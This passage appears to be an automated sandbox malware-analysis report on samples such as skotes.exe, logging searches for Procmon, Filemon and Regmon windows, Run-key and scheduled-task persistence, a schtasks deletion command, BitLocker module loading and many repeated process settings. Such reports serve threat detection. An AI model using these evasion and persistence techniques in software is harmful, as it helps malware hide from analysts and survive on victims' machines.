                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
